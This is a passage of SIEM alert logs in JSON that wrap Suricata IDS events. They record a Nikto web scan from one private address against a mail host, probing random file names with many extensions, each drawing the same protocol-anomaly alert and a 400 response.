(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.549896+0000","flow_id":"203104692363407.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47070","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.iso2022-jp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.553708+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":68,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.109166","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.553708+0000\",\"flow_id\":1482309161872368,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47072,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.es\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.553708+0000","flow_id":"1482309161872368.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47072","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.es","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.556583+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":69,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.110703","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.556583+0000\",\"flow_id\":993915545746050,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47074,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.utf8\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.556583+0000","flow_id":"993915545746050.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47074","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.utf8","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.570703+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":70,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.112242","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.570703+0000\",\"flow_id\":304066488610493,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47076,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.php=\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.570703+0000","flow_id":"304066488610493.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47076","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.php=","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.575638+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":71,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.113781","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.575638+0000\",\"flow_id\":1484675688873005,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47078,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dk\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.575638+0000","flow_id":"1484675688873005.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47078","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dk","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.578131+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":72,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.115318","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.578131+0000\",\"flow_id\":1753841289317738,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47080,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.php4\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.578131+0000","flow_id":"1753841289317738.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47080","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.php4","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.581866+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":73,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.116859","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.581866+0000\",\"flow_id\":1.17482386324625e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47082,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.sh\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.581866+0000","flow_id":"1174823863246250.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47082","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.sh","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.585321+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":74,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.118400","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.585321+0000\",\"flow_id\":1629124028984059,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47084,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cfc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.585321+0000","flow_id":"1629124028984059.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47084","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cfc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.588333+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":75,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.119939","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.588333+0000\",\"flow_id\":1.72249232303402e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47086,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.jse\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.588333+0000","flow_id":"1722492323034020.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47086","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.jse","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.590216+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":76,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.121482","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.590216+0000\",\"flow_id\":479451478163037,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47088,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.nlm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.590216+0000","flow_id":"479451478163037.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47088","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.nlm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.592132+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":77,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.123019","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.592132+0000\",\"flow_id\":88759778018679,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47090,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.printer\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.592132+0000","flow_id":"88759778018679.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47090","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.printer","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.594670+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":78,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.124562","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.594670+0000\",\"flow_id\":560166798495674,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47092,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.1\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.594670+0000","flow_id":"560166798495674.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47092","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.1","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.599159+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":79,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.126095","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.599159+0000\",\"flow_id\":1422785210098109,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47094,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.pwd\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.599159+0000","flow_id":"1422785210098109.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47094","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.pwd","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.601252+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":80,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.127634","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.601252+0000\",\"flow_id\":1543190323276216,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47096,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cp866\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.601252+0000","flow_id":"1543190323276216.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47096","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cp866","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.603136+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":81,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.129177","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.603136+0000\",\"flow_id\":1566365966807384,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47098,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ida\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.603136+0000","flow_id":"1566365966807384.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47098","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ida","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.612252+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":82,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.130716","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.612252+0000\",\"flow_id\":1249779632453529,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47100,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.wwwacl\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.612252+0000","flow_id":"1249779632453529.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47100","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.wwwacl","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.616417+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant 